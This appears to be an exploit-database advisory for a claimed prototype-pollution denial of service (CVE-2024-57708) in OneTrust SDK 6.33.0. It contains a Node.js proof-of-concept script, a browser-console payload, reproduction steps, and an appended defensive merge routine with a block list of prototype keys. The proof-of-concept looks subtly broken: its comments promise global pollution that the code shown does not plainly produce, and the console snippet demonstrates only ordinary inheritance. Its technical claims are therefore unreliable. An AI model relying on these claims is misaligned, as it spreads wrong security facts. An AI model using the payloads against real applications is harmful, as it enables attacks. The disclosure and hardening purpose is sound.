OneTrust SDK 6.33.0 - Denial Of Service (DoS)

26 Jun 2025 00:00:00 | Reported by Alameen Karim Merali | Type: exploitdb | www.exploit-db.com | 389 Views

Vulnerability in OneTrust SDK v6.33.0 allows Denial of Service via Prototype Pollution attack.

Related

| Reporter | Title | Published |
|---|---|---|
| Circl | CVE-2024-57708 | 25 Jun 2025 15:52 |
| CNNVD | OneTrust SDK security vulnerability | 25 Jun 2025 00:00 |
| CVE | CVE-2024-57708 | 25 Jun 2025 00:00 |
| Cvelist | CVE-2024-57708 | 25 Jun 2025 00:00 |
| EUVD | EUVD-2024-54703 | 3 Oct 2025 20:07 |
| NVD | CVE-2024-57708 | 25 Jun 2025 16:15 |
| Packet Storm | OneTrust SDK 6.33.0 Prototype Pollution / Denial of Service | 23 Jun 2025 00:00 |
| Positive Technologies | PT-2025-26840 · Onetrust · Onetrust Sdk | 25 Jun 2025 00:00 |
| RedhatCVE | CVE-2024-57708 | 27 Jun 2025 00:16 |
| Vulnrichment | CVE-2024-57708 | 25 Jun 2025 00:00 |

- **Exploit Title**: OneTrust SDK 6.33.0 - Denial Of Service (DoS)
- **Date**: 01/01/2025
- **Exploit Author**: Alameen Karim Merali
- **Vendor Homepage**: [OneTrust JavaScript API](https://developer.onetrust.com/onetrust/docs/javascript-api)
- **Software Link**: [otBannerSdk.js v6.33.0](https://discord.com/assets/oneTrust/v4/scripttemplates/6.33.0/otBannerSdk.js)
- **Version**: 6.33.0
- **Tested on**: Kali Linux
- **CVE ID**: CVE-2024-57708

## Vulnerability Summary

A vulnerability exists in **OneTrust SDK v6.33.0** that allows an attacker to perform **Prototype Pollution** via the misuse of `Object.setPrototypeOf` and `Object.assign`. An attacker can inject malicious properties into the prototype chain, potentially causing **Denial of Service (DoS)** or altering the behavior of inherited objects throughout the application.

## Technical Details

The affected code includes prototype assignment logic such as:

```javascript
var o = function(e, t) {
  return (o = Object.setPrototypeOf || { __proto__: [] } instanceof ...);
};
```

If the `t` argument (a user-supplied object) contains a `__proto__` or `constructor.prototype` reference, it can pollute `Object.prototype` globally.

## Proof-of-Concept (PoC)

```javascript
function testPrototypePollution() {
  const maliciousPayload = {
    "__proto__": {
      polluted: "yes"
    }
  };

  // Using vulnerable function 'o'
  try {
    o({}, maliciousPayload);
    console.log("After o:", {}.polluted); // "yes"
  } catch (e) {
    console.error("Error testing o:", e);
  }

  // Using Object.assign
  try {
    Object.assign({}, maliciousPayload);
    console.log("After Object.assign:", {}.polluted); // "yes"
  } catch (e) {
    console.error("Error testing Object.assign:", e);
  }

  // Cleanup
  delete Object.prototype.polluted;
}
testPrototypePollution();
```

## Browser Console PoC (DevTools)

```javascript
var maliciousObj = { __proto__: { hacked: true } };
var newObj = Object.create(maliciousObj);
console.log(newObj.hacked); // true
```

Screenshot: [PoC Screenshot](https://ibb.co/B2hyYr5v)

## Steps to Reproduce

1. Save the PoC script above as `exploit.js`
2. Run using Node.js: `node exploit.js`
3. Observe polluted output (`{}.polluted === "yes"`)
4. Alternatively, run the payload in browser DevTools

## Impact

- Global object pollution
- Application logic errors
- Potential DoS
- Further exploitation depending on context

## Recommendation

Developers should upgrade to a patched version and sanitize any user input used in object merging or prototype manipulation.
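
One way to apply the sanitization recommended above, as an added example (not OneTrust's code and not part of the original advisory): a recursive merge that refuses prototype-related keys in untrusted JSON and reports where they occurred. The names `FORBIDDEN_KEYS`, `findForbiddenKeys` and `safeMerge`, and the sample payload, are assumptions constructed for illustration.

```javascript
// Added example: hardened merge for untrusted JSON (not OneTrust code).
// FORBIDDEN_KEYS, findForbiddenKeys and safeMerge are hypothetical names.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

const isPlainObject = (v) =>
  v !== null && typeof v === "object" && !Array.isArray(v);

// Return the dotted path of every prototype-related key in `value`,
// so the input can be rejected or logged before any merge happens.
function findForbiddenKeys(value, path = "", found = []) {
  if (value === null || typeof value !== "object") return found;
  for (const key of Object.keys(value)) {
    const here = path ? `${path}.${key}` : key;
    if (FORBIDDEN_KEYS.has(key)) found.push(here);
    findForbiddenKeys(value[key], here, found);
  }
  return found;
}

// Recursive merge that copies own enumerable keys only, skips forbidden
// keys, and never descends into a property inherited from a prototype.
function safeMerge(target, source) {
  if (!isPlainObject(source)) return target;
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      const child = own && isPlainObject(target[key]) ? target[key] : {};
      target[key] = safeMerge(child, value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed sample input: JSON.parse creates an *own* "__proto__" key,
// which is the form untrusted data usually arrives in.
const untrusted = JSON.parse(
  '{"theme":{"dark":true},"__proto__":{"polluted":"yes"},' +
  '"a":{"constructor":{"prototype":{"polluted":"yes"}}}}'
);

const report = findForbiddenKeys(untrusted);
const merged = safeMerge({ theme: { dark: false, size: 2 } }, untrusted);
console.log(report, merged, {}.polluted);
```

A non-empty `report` is a useful signal to log or reject the request outright rather than silently dropping the keys.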

26 Jun 2025 00:00 (current)

- Vulners AI Score: 7.4 (High risk)
- CVSS 3.1: 5.7
- EPSS: 0.00573